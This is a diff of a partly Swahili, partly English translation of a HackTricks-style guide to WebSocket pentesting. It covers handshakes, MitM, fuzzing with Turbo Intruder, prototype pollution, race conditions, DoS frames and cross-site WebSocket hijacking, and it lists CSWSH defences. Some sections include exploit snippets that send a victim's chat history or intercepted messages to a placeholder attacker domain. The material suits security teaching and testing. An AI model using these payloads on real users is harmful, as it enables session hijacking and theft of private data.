-WebSocket connections zinaundwa kupitia mkutano wa awali wa **HTTP** na zimeundwa kuwa **za muda mrefu**, zikiruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa kibiashara. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **latency ya chini au mawasiliano yanayoanzishwa na seva**, kama vile mitiririko ya data za kifedha za moja kwa moja.
+Muunganisho wa WebSocket huanzishwa kupitia handshake ya awali ya **HTTP** na yameundwa kuwa **ya muda mrefu**, kuruhusu ujumbe wa pande mbili wakati wowote bila haja ya mfumo wa transaksheni. Hii inafanya WebSockets kuwa na faida hasa kwa programu zinazohitaji **latency ya chini au mawasiliano yanayotokana na server**, kama vile stream za data za kifedha za moja kwa moja.

-### Establishment of WebSocket Connections
+### Uanzishaji wa Muunganisho wa WebSocket

-Maelezo ya kina juu ya kuanzisha WebSocket connections yanaweza kupatikana [**hapa**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc). Kwa muhtasari, WebSocket connections kwa kawaida huanzishwa kupitia JavaScript upande wa mteja kama inavyoonyeshwa hapa chini:
+Maelezo ya kina kuhusu uanzishaji wa muunganisho wa WebSocket yanaweza kupatikana [**here**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc). Kwa muhtasari, muunganisho wa WebSocket kwa kawaida huanzishwa kupitia JavaScript ya upande wa mteja kama ilivyoonyeshwa hapa chini:
 ```javascript
 var ws = new WebSocket("wss://normal-website.com/ws")
 ```
-Protokali `wss` inaashiria muunganisho wa WebSocket ulio salama na **TLS**, wakati `ws` inaashiria muunganisho **usio salama**.
+Itifaki ya `wss` inaashiria muunganisho wa WebSocket uliolindwa na **TLS**, wakati `ws` inaonyesha muunganisho **usio salama**.

-Wakati wa kuanzisha muunganisho, mkono wa handshake unafanywa kati ya kivinjari na seva kupitia HTTP. Mchakato wa handshake unahusisha kivinjari kutuma ombi na seva kujibu, kama inavyoonyeshwa katika mifano ifuatayo:
+Wakati wa kuanzishwa kwa muunganisho, handshake hufanyika kati ya kivinjari na seva kupitia HTTP. Mchakato wa handshake unahusisha kivinjari kutuma ombi na seva kujibu, kama ilivyoonyeshwa katika mifano ifuatayo:

 Kivinjari kinatuma ombi la handshake:
 ```javascript
@ -26,88 +26,205 @@ Connection: keep-alive, Upgrade
 Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
 Upgrade: websocket
 ```
-Majibu ya mkono wa mkono wa seva:
+Jibu la handshake la server:
 ```javascript
 HTTP/1.1 101 Switching Protocols
 Connection: Upgrade
 Upgrade: websocket
 Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
 ```
-The connection remains open for message exchange in both directions once established.
+Muunganisho unabaki wazi kwa kubadilishana ujumbe katika pande zote mbili baada ya kuanzishwa.

-**Key Points of the WebSocket Handshake:**
+**Mambo Muhimu ya WebSocket Handshake:**

- The `Connection` and `Upgrade` headers signal the initiation of a WebSocket handshake.
- The `Sec-WebSocket-Version` header indicates the desired WebSocket protocol version, usually `13`.
- A Base64-encoded random value is sent in the `Sec-WebSocket-Key` header, ensuring each handshake is unique, which helps to prevent issues with caching proxies. This value is not for authentication but to confirm that the response is not generated by a misconfigured server or cache.
- The `Sec-WebSocket-Accept` header in the server's response is a hash of the `Sec-WebSocket-Key`, verifying the server's intention to open a WebSocket connection.
+- Vichwa vya `Connection` na `Upgrade` vinaashiria kuanzishwa kwa WebSocket Handshake.
+- Kichwa cha `Sec-WebSocket-Version` kinaonyesha toleo la itifaki la WebSocket linalotakiwa, kawaida `13`.
+- Thamani isiyotarajiwa iliyochapwa kwa Base64 inatumwa kwenye kichwa cha `Sec-WebSocket-Key`, kuhakikisha kila handshake ni ya kipekee, jambo ambalo husaidia kuzuia matatizo yanayotokana na caching proxies. Thamani hii si kwa ajili ya authentication bali kuthibitisha kwamba response haijatengenezwa na server au cache iliyopangwa vibaya.
+- Kichwa cha `Sec-WebSocket-Accept` kwenye response ya server ni hash ya `Sec-WebSocket-Key`, ikithibitisha nia ya server ya kufungua muunganisho wa WebSocket.

-These features ensure the handshake process is secure and reliable, paving the way for efficient real-time communication.
+Vipengele hivi vinahakikisha mchakato wa handshake ni salama na wa kuaminika, na kufungua njia kwa mawasiliano ya muda halisi yenye ufanisi.

-### Linux console
+### Konsoli ya Linux

-You can use `websocat` to establish a raw connection with a websocket.
+Unaweza kutumia `websocat` kuanzisha muunganisho wa raw na websocket.
 ```bash
 websocat --insecure wss://10.10.10.10:8000 -v
 ```
-Au kuunda seva ya websocat:
+Au kuunda websocat server:
 ```bash
 websocat -s 0.0.0.0:8000 #Listen in port 8000
 ```
-### MitM websocket connections
+### MitM websocket muunganisho

-Ikiwa unapata kwamba wateja wameunganishwa na **HTTP websocket** kutoka kwenye mtandao wako wa ndani, unaweza kujaribu [ARP Spoofing Attack](../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) ili kufanya shambulio la MitM kati ya mteja na seva.\
-Mara tu mteja anapojaribu kuungana, unaweza kutumia:
+Ikiwa utagundua kuwa wateja wameunganishwa kwa **HTTP websocket** kutoka kwenye mtandao wako wa ndani unaweza kujaribu [ARP Spoofing Attack ](../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) ili kufanya MitM attack kati ya mteja na seva.\
+Mara mteja anapojaribu kuunganishwa kwako unaweza kisha kutumia:
 ```bash
 websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 ```
-### Websockets enumeration
+### Websockets uorodheshaji

-Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kugundua, fingerprint na kutafuta** **vulnerabilities** zinazojulikana katika websockets kiotomatiki.
+Unaweza kutumia **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **kugundua, fingerprint na kutafuta** **vulnerabilities** zilizojulikana kwenye websockets kwa kiotomatiki.

-### Websocket Debug tools
+### Websocket Zana za Debug

- **Burp Suite** inasaidia mawasiliano ya MitM websockets kwa njia inayofanana sana na inavyofanya kwa mawasiliano ya kawaida ya HTTP.
- [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuruhusu kudhibiti mawasiliano ya Websocket kwa njia bora zaidi katika Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.**
- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Fupi kwa "**WebSocket/Socket.io Proxy**", chombo hiki, kilichoandikwa kwa Node.js, kinatoa interface ya mtumiaji ili **kukamata, kuingilia, kutuma ujumbe wa kawaida** na kuona mawasiliano yote ya WebSocket na Socket.IO kati ya mteja na seva.
- [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa ajili ya penetration testing. Inatoa interface ya kuangalia **ujumbe wa websocket unaoingia na kutuma mpya**, kwa mfumo rahisi wa **kujiendesha** mawasiliano haya.
- [**https://websocketking.com/**](https://websocketking.com/) ni **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets**.
- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) kati ya aina nyingine za mawasiliano/protocols, inatoa **web ya kuwasiliana** na tovuti nyingine kwa kutumia **websockets.**
+- **Burp Suite** inasaidia MitM websockets communication kwa njia inayofanana sana na ile ya mawasiliano ya kawaida ya HTTP.
+- The [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite extension** itakuwezesha kusimamia vizuri zaidi Websocket communications ndani ya Burp kwa kupata **history**, kuweka **interception rules**, kutumia **match and replace** rules, kutumia **Intruder** na **AutoRepeater.**
+- [**WSSiP**](https://github.com/nccgroup/wssip)**:** Short for "**WebSocket/Socket.io Proxy**", tool hii, iliyoandikwa kwa Node.js, inatoa user interface ya **capture, intercept, send custom** messages na kuonyesha mawasiliano yote ya WebSocket na Socket.IO kati ya client na server.
+- [**wsrepl**](https://github.com/doyensec/wsrepl) ni **interactive websocket REPL** iliyoundwa mahsusi kwa penetration testing. Inatoa kiolesura cha kuangalia **incoming websocket messages and sending new ones**, na framework rahisi kutumia kwa **automating** mawasiliano haya.
+- [**https://websocketking.com/**](https://websocketking.com/) ni tovuti ya kuwasiliana na wavuti nyingine kwa kutumia **websockets**.
+- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) pamoja na aina nyingine za communications/protocols, inatoa tovuti ya kuwasiliana na wavuti nyingine kwa kutumia **websockets.**

-## Decrypting Websocket
+## Kufungua Websocket

 - [https://github.com/Anof-cyber/PyCript](https://github.com/Anof-cyber/PyCript)
 - [https://github.com/Anof-cyber/PyCript-WebSocket/](https://github.com/Anof-cyber/PyCript-WebSocket/)

 ## Websocket Lab

-Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una msimbo wa kuzindua tovuti kwa kutumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo.
+Katika [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) una code ya kuanzisha tovuti inayotumia websockets na katika [**this post**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) unaweza kupata maelezo.

 ## Websocket Fuzzing

-Kiendelezi cha burp [**Backslash Powered Scanner**](https://github.com/PortSwigger/backslash-powered-scanner) sasa kinaruhusu fuzz pia ujumbe wa WebSocket. Unaweza kusoma maelezo zaidi kuhusu hii [**here**](https://arete06.com/posts/fuzzing-ws/#adding-websocket-support-to-backslash-powered-scanner).
+Extension ya Burp [**Backslash Powered Scanner**](https://github.com/PortSwigger/backslash-powered-scanner) sasa inaruhusu kufuzz pia WebSocket messages. Unaweza kusoma taarifa zaidi kuhusu hili [**hapa**](https://arete06.com/posts/fuzzing-ws/#adding-websocket-support-to-backslash-powered-scanner).
+
+### WebSocket Turbo Intruder (Burp extension)
+
+PortSwigger's WebSocket Turbo Intruder inaleta Turbo Intruder–style Python scripting na high‑rate fuzzing kwa WebSockets. Sakinisha kutoka BApp Store au kutoka source. Inajumuisha vipengele viwili:
+
+- Turbo Intruder: high‑volume messaging to a single WS endpoint using custom engines.
+- HTTP Middleware: exposes a local HTTP endpoint that forwards bodies as WS messages over a persistent connection, so any HTTP‑based scanner can probe WS backends.
+
+Mufano wa script ya msingi ya kufuzz WS endpoint na kuchuja majibu yanayofaa:
+```python
+def queue_websockets(upgrade_request, message):
+connection = websocket_connection.create(upgrade_request)
+for i in range(10):
+connection.queue(message, str(i))
+
+def handle_outgoing_message(websocket_message):
+results_table.add(websocket_message)
+
+@MatchRegex(r'{\"user\":\"Hal Pline\"')
+def handle_incoming_message(websocket_message):
+results_table.add(websocket_message)
+```
+Tumia decorators kama `@MatchRegex(...)` kupunguza kelele wakati ujumbe mmoja unasababisha majibu mengi.
+
+### Daraja la WS nyuma ya HTTP (HTTP Middleware)
+
+Funga muunganisho wa WS unaodumu na upeleke miili ya HTTP kama ujumbe za WS kwa ajili ya upimaji otomatiki na HTTP scanners:
+```python
+def create_connection(upgrade_request):
+connection = websocket_connection.create(upgrade_request)
+return connection
+
+@MatchRegex(r'{\"user\":\"You\"')
+def handle_incoming_message(websocket_message):
+results_table.add(websocket_message)
+```
+Kisha tuma HTTP kwa ndani; mwili unapitishwa kama ujumbe wa WS:
+```http
+POST /proxy?url=https%3A%2F%2Ftarget/ws HTTP/1.1
+Host: 127.0.0.1:9000
+Content-Length: 16
+
+{"message":"hi"}
+```
+Hii inakuwezesha kuendesha backend za WS huku ukichuja matukio 'ya kuvutia' (mfano, SQLi errors, auth bypass, command injection behavior).
+
+### Socket.IO kusimamia (handshake, heartbeats, events)
+
+Socket.IO huongeza framing yake juu ya WS. Gundua kwa kutumia query parameter inayotakiwa `EIO` (kwa mfano, `EIO=4`). Weka session hai kwa kutumia Ping (`2`) na Pong (`3`) na anza mazungumzo na `"40"`, kisha tuma matukio kama `42["message","hello"]`.
+
+Intruder mfano:
+```python
+import burp.api.montoya.http.message.params.HttpParameter as HttpParameter
+
+def queue_websockets(upgrade_request, message):
+connection = websocket_connection.create(
+upgrade_request.withUpdatedParameters(HttpParameter.urlParameter("EIO", "4")))
+connection.queue('40')
+connection.queue('42["message","hello"]')
+
+@Pong("3")
+def handle_outgoing_message(websocket_message):
+results_table.add(websocket_message)
+
+@PingPong("2", "3")
+def handle_incoming_message(websocket_message):
+results_table.add(websocket_message)
+```
+Toleo la adapter ya HTTP:
+```python
+import burp.api.montoya.http.message.params.HttpParameter as HttpParameter
+
+def create_connection(upgrade_request):
+connection = websocket_connection.create(
+upgrade_request.withUpdatedParameters(HttpParameter.urlParameter("EIO", "4")))
+connection.queue('40')
+connection.decIn()
+return connection
+
+@Pong("3")
+def handle_outgoing_message(websocket_message):
+results_table.add(websocket_message)
+
+@PingPong("2", "3")
+def handle_incoming_message(websocket_message):
+results_table.add(websocket_message)
+```
+### Kugundua server‑side prototype pollution kupitia Socket.IO
+
+Kwa kufuata PortSwigger’s safe detection technique, jaribu polluting Express internals kwa kutuma payload kama:
+```json
+{"__proto__":{"initialPacket":"Polluted"}}
+```
+If greetings or behavior change (e.g., echo includes "Polluted"), you likely polluted server-side prototypes. Impact depends on reachable sinks; correlate with the gadgets in the Node.js prototype pollution section. See:
+
+- Angalia [NodeJS – __proto__ & prototype Pollution](deserialization/nodejs-proto-prototype-pollution/README.md) kwa sinks/gadgets na mawazo ya chaining.
+
+### WebSocket race conditions with Turbo Intruder
+
+The default engine batches messages on one connection (great throughput, poor for races). Use the THREADED engine to spawn multiple WS connections and fire payloads in parallel to trigger logic races (double‑spend, token reuse, state desync). Start from the example script and tune concurrency in `config()`.
+
+- Jifunze methodolojia na mbadala katika [Race Condition](race-condition.md) (tazama “RC in WebSockets”).
+
+### WebSocket DoS: malformed frame “Ping of Death”
+
+Craft WS frames whose header declares a huge payload length but send no body. Some WS servers trust the length and pre‑allocate buffers; setting it near `Integer.MAX_VALUE` can cause Out‑Of‑Memory and a remote unauth DoS. See the example script.
+
+### CLI and debugging
+
+- Headless fuzzing: `java -jar WebSocketFuzzer-<version>.jar <scriptFile> <requestFile> <endpoint> <baseInput>`
+- Enable the WS Logger to capture and correlate messages using internal IDs.
+- Use `inc*`/`dec*` helpers on `Connection` to tweak message ID handling in complex adapters.
+- Decorators like `@PingPong`/`@Pong` and helpers like `isInteresting()` reduce noise and keep sessions alive.
+
+### Operational safety
+
+High‑rate WS fuzzing can open many connections and send thousands of messages per second. Malformed frames and high rates may cause real DoS. Use only where permitted.

 ## Cross-site WebSocket hijacking (CSWSH)

-**Cross-site WebSocket hijacking**, pia inajulikana kama **cross-origin WebSocket hijacking**, inatambulika kama kesi maalum ya **[Cross-Site Request Forgery (CSRF)](csrf-cross-site-request-forgery.md)** inayohusisha mikataba ya WebSocket. Uthibitisho huu unatokea wakati mikataba ya WebSocket inathibitishwa pekee kupitia **HTTP cookies** bila **CSRF tokens** au hatua nyingine za usalama.
+Cross-site WebSocket hijacking, also known as cross-origin WebSocket hijacking, is identified as a specific case of **[Cross-Site Request Forgery (CSRF)](csrf-cross-site-request-forgery.md)** affecting WebSocket handshakes. This vulnerability arises when WebSocket handshakes authenticate solely via **HTTP cookies** without **CSRF tokens** or similar security measures.

-Wavamizi wanaweza kutumia hii kwa kuandaa **ukurasa wa wavuti mbaya** unaoanzisha muunganisho wa WebSocket wa cross-site kwa programu iliyo hatarini. Kwa hivyo, muunganisho huu unachukuliwa kama sehemu ya kikao cha mwathirika na programu, ukitumia ukosefu wa ulinzi wa CSRF katika mfumo wa usimamizi wa kikao.
+Attackers can exploit this by hosting a **malicious web page** that initiates a cross-site WebSocket connection to a vulnerable application. Consequently, this connection is treated as part of the victim's session with the application, exploiting the lack of CSRF protection in the session handling mechanism.

-Ili shambulio hili lifanye kazi, haya ndiyo mahitaji:
+In order for this attack to work, these are the requirements:

- Uthibitisho wa websocket **lazima uwe wa msingi wa cookie**
- Cookie lazima iweze kupatikana kutoka seva ya wavamizi (hii kawaida inamaanisha **`SameSite=None`**) na hakuna **Firefox Total Cookie Protection** iliyoanzishwa katika Firefox na hakuna **cookies za wahusika wengine zilizozuiliwa** katika Chrome.
- Seva ya websocket haipaswi kuangalia asili ya muunganisho (au hii inapaswa kuwa na uwezo wa kupita)
+- The websocket **authentication must be cookie based**
+- The cookie must be accessible from the attackers server (this usually means `SameSite=None`) and no **Firefox Total Cookie Protection** enabled in Firefox and no **blocked third-party cookies** in Chrome.
+- The websocket server must not check the origin of the connection (or this must be bypasseable)

-Pia:
+Also:

- Ikiwa uthibitisho unategemea muunganisho wa ndani (kwa localhost au kwa mtandao wa ndani) shambulio **litawezekana** kwani hakuna ulinzi wa sasa unaokataza hilo (angalia [more info here](https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/))
+- If the authentication is based on a local connection (to localhost or to a local network) the attack **will be possible** as no current protection forbids it (check [more info here](https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/))

 ### Simple Attack

-Kumbuka kwamba wakati wa **kuanzisha** muunganisho wa **websocket** **cookie** inatumwa kwa seva. **Seva** inaweza kuwa ikitumia hiyo **kuhusisha** kila **mtumiaji maalum** na **kikao chake cha websocket** kulingana na cookie iliyotumwa.
+Kumbuka kwamba wakati wa kuanzisha connection ya websocket, cookie inatumwa kwa server. Server inaweza kuitumia kuhusisha kila mtumiaji maalum na websocket session yake kwa msingi wa cookie iliyotumwa.

-Kisha, ikiwa kwa **mfano** **seva ya websocket** **inatuma nyuma historia ya mazungumzo** ya mtumiaji ikiwa ujumbe na "**READY"** umetumwa, basi **XSS rahisi** inayounda muunganisho (**cookie** itatumwa **kiotomatiki** kuidhinisha mtumiaji mwathirika) **ikiwatuma** "**READY**" itakuwa na uwezo wa **kurejesha** historia ya **mazungumzo**.
+Kisha, kwa mfano ikiwa websocket server inarejesha historia ya mazungumzo ya mtumiaji ikiwa msg yenye "READY" itatumwa, basi XSS rahisi inayoongeza connection (cookie itatumwa moja kwa moja ili kumruhusu mwathirika) ikituma "READY" itakuwa na uwezo wa kupata historia ya mazungumzo.
 ```html
 <script>
 websocket = new WebSocket('wss://your-websocket-URL')
@ -122,13 +239,13 @@ fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
 }
 </script>
 ```
-### Cross Origin + Cookie with a different subdomain
+### Cross Origin + Cookie na subdomain tofauti

-Katika chapisho hili la blogu [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji alifanikiwa **kutekeleza Javascript isiyo na mipaka katika subdomain** ya kikoa ambapo mawasiliano ya web socket yalikuwa yanafanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa **inatumwa**, na kwa sababu **Websocket haikukagua Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**.
+Katika blog post hii [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) mshambuliaji aliweza **kutekeleza arbitrary Javascript kwenye subdomain** ya domain ambapo mawasiliano ya websocket yalifanyika. Kwa sababu ilikuwa **subdomain**, **cookie** ilikuwa ikitumwa, na kwa sababu **Websocket haikuangalia Origin ipasavyo**, ilikuwa inawezekana kuwasiliana nayo na **kuiba tokens kutoka kwake**.

-### Stealing data from user
+### Kuiba data kutoka kwa mtumiaji

-Nakili programu ya wavuti unayotaka kujifanya (faili za .html kwa mfano) na ndani ya script ambapo mawasiliano ya websocket yanafanyika ongeza hii code:
+Nakili web application unayotaka kujifanya (the .html files kwa mfano) na ndani ya script ambapo mawasiliano ya websocket yanatokea ongeza code hii:
 ```javascript
 //This is the script tag to load the websocket hooker
 ;<script src="wsHook.js"></script>
@ -148,34 +265,34 @@ xhttp.send()
 return messageEvent
 }
 ```
-Sasa pakua faili `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **uhifadhi ndani ya folda yenye faili za wavuti**.\
-Kufichua programu ya wavuti na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na kupokelewa kupitia websocket:
+Sasa pakua faili `wsHook.js` kutoka [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) na **ihifadhi ndani ya folda yenye faili za wavuti**.\
+Ukiweka web application hadharani na kumfanya mtumiaji aungane nayo utaweza kuiba ujumbe uliotumwa na uliopokelewa kupitia websocket:
 ```javascript
 sudo python3 -m http.server 80
 ```
-### CSWSH Protections
+### Ulinzi wa CSWSH

-Shambulio la CSWSH linategemea ukweli kwamba **mtumiaji atajiunga na ukurasa mbaya** ambao uta **fungua muunganisho wa websocket** kwa ukurasa wa wavuti ambapo mtumiaji tayari ameunganishwa na atajitambulisha kama yeye kwa sababu ombi litatumia vidakuzi vya mtumiaji.
+Shambulio la CSWSH linategemea ukweli kwamba **mtumiaji ataunganisha kwenye ukurasa mbaya** ambao uta**fungua websocket connection** kwa ukurasa wa wavuti ambapo mtumiaji tayari ameunganishwa na utafanya kuidhinishwa kwa niaba yake kwa sababu ombi litaituma cookies za mtumiaji.

-Sasa hivi, ni rahisi sana kuzuia tatizo hili:
+Hivi sasa, ni rahisi sana kuzuia tatizo hili:

- **Websocket server checking the origin**: Websocket server inapaswa kila wakati kuangalia kutoka wapi mtumiaji anajiunga ili kuzuia kurasa zisizotarajiwa kuungana nayo.
- **Authentication token**: Badala ya kutegemea uthibitisho kwenye cookie, muunganisho wa websocket unaweza kutegemea token ambayo inatengenezwa na server kwa mtumiaji asiyejulikana kwa mshambuliaji (kama token ya anti-CSRF)
- **SameSite Cookie attribute**: Vidakuzi vyenye thamani ya `SameSite` kama `Lax` au `Strict` havitatumwa kutoka ukurasa wa mshambuliaji wa nje kwenda kwenye server ya mwathirika, kwa hivyo, uthibitisho wa msingi wa cookie hautafanikiwa. Kumbuka kwamba Chrome sasa inaweka thamani **`Lax`** kwa vidakuzi bila bendera hii iliyotajwa ikifanya hii kuwa salama zaidi kwa default. Hata hivyo, dakika 2 za kwanza vidakuzi vinapoundwa vitakuwa na thamani **`None`** ikifanya kuwa hatarini wakati huo wa muda mfupi (pia inatarajiwa kwamba kipimo hiki kitondolewa wakati fulani).
- **Firefox Total Cookie Protection**: Ulinzi wa Jumla wa Cookie unafanya kazi kwa kutenga vidakuzi kwa tovuti ambayo vimeundwa. Kimsingi kila tovuti ina sehemu yake ya uhifadhi wa vidakuzi ili kuzuia wahusika wengine kuunganisha historia ya kivinjari ya mtumiaji. Hii inafanya **CSWSH isitumike** kwani tovuti ya washambuliaji haitakuwa na ufikiaji wa vidakuzi.
- **Chrome third-party cookies block**: Hii pia inaweza kuzuia kutuma cookie ya mtumiaji aliyethibitishwa kwa websocket server hata na `SameSite=None`.
+- **Websocket server checking the origin**: Server ya websocket inapaswa kila mara kuangalia kutoka wapi mtumiaji anaungana ili kuzuia kurasa zisizotarajiwa kuungana nayo.
+- **Authentication token**: Badala ya kuweka msingi wa authentication kwenye cookie, websocket connection inaweza kuendeshwa kwa token inayozalishwa na server kwa mtumiaji ambayo mshambuliaji haijui (kama anti-CSRF token).
+- **SameSite Cookie attribute**: Cookies zenye thamani ya `SameSite` kama `Lax` au `Strict` hazitatumwa kutoka kwenye ukurasa wa mshambuliaji wa nje kwenda server ya mwathiri, kwa hivyo authentication inayotegemea cookie haitafanikiwa. Kumbuka kuwa Chrome sasa huweka thamani **`Lax`** kwa cookies ambazo hazijaainishwa na flag hii, na kufanya hii kuwa salama kwa default. Hata hivyo, katika dakika mbili za kwanza baada ya cookie kuundwa itakuwa na thamani **`None`**, na kuifanya iwe hatarini kwa kipindi hicho kifupi (pia inatarajiwa kuwa kipimo hiki kitabadilishwa baadaye).
+- **Firefox Total Cookie Protection**: Total Cookie Protection hufanya kazi kwa kutenganisha cookies kwenye tovuti ambazo zimetengenezwa. Kimsingi kila tovuti ina sehemu yake ya kuhifadhi cookies ili kuzuia washiriki wa tatu kuunganisha historia ya kuvinjari ya mtumiaji. Hii inafanya **CSWSH isiyotumika** kwani tovuti ya mshambuliaji haitakuwa na ufikiaji wa cookies.
+- **Chrome third-party cookies block**: Hii pia inaweza kuzuia kutumwa kwa cookie ya mtumiaji aliyeidhinishwa kwa server ya websocket hata ikiwa `SameSite=None`.

 ## Race Conditions

-Misingi ya Mbio katika WebSockets pia ni jambo, [angalia habari hii kujifunza zaidi](race-condition.md#rc-in-websockets).
+Race Conditions katika WebSockets pia zipo, [check this information to learn more](race-condition.md#rc-in-websockets).

-## Other vulnerabilities
+## Udhaifu mwingine

-Kama Web Sockets ni mekanismu ya **kutuma data kwa upande wa server na upande wa mteja**, kulingana na jinsi server na mteja wanavyoshughulikia habari, **Web Sockets zinaweza kutumika kutekeleza udhaifu mwingine kama XSS, SQLi au udhaifu mwingine wa kawaida wa wavuti ukitumia ingizo la mtumiaji kutoka websocket.**
+Kwa kuwa Web Sockets ni njia ya **kutuma data kwa upande wa server na upande wa client**, kulingana na jinsi server na client zinavyoshughulikia taarifa, **Web Sockets zinaweza kutumika kutekeleza udhaifu mwingine kama XSS, SQLi au udhaifu mwingine wa kawaida wa web ukitumia input ya mtumiaji kutoka websocket.**

 ## **WebSocket Smuggling**

-Udhaifu huu unaweza kukuruhusu **kupita vizuizi vya proxies za kinyume** kwa kuwafanya waamini kwamba **mawasiliano ya websocket yameanzishwa** (hata kama si kweli). Hii inaweza kumruhusu mshambuliaji **kuaccess mwisho wa siri**. Kwa maelezo zaidi angalia ukurasa ufuatao:
+Udhaifu huu unaweza kukuruhusu **kupitisha vizuizi vya reverse proxies** kwa kuwafanya waamini kwamba **mawasiliano ya websocket yalianzishwa** (hata kama sio kweli). Hii inaweza kumruhusu mshambuliaji **kupata endpoints zilizofichwa**. Kwa taarifa zaidi angalia ukurasa ufuatao:


 {{#ref}}
@ -186,5 +303,13 @@ h2c-smuggling.md

 - [https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages](https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages)
 - [https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/](https://blog.includesecurity.com/2025/04/cross-site-websocket-hijacking-exploitation-in-2025/)
+- [WebSocket Turbo Intruder: Unearthing the WebSocket Goldmine](https://portswigger.net/research/websocket-turbo-intruder-unearthing-the-websocket-goldmine)
+- [WebSocket Turbo Intruder – BApp Store](https://portswigger.net/bappstore/ba292c5982ea426c95c9d7325d9a1066)
+- [WebSocketTurboIntruder – GitHub](https://github.com/d0ge/WebSocketTurboIntruder)
+- [Turbo Intruder background](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
+- [Server-side prototype pollution – safe detection methods](https://portswigger.net/research/server-side-prototype-pollution#safe-detection-methods-for-manual-testers)
+- [WS RaceCondition PoC (Java)](https://github.com/redrays-io/WS_RaceCondition_PoC)
+- [RaceConditionExample.py](https://github.com/d0ge/WebSocketTurboIntruder/blob/main/src/main/resources/examples/RaceConditionExample.py)
+- [PingOfDeathExample.py](https://github.com/d0ge/WebSocketTurboIntruder/blob/main/src/main/resources/examples/PingOfDeathExample.py)

 {{#include ../banners/hacktricks-training.md}}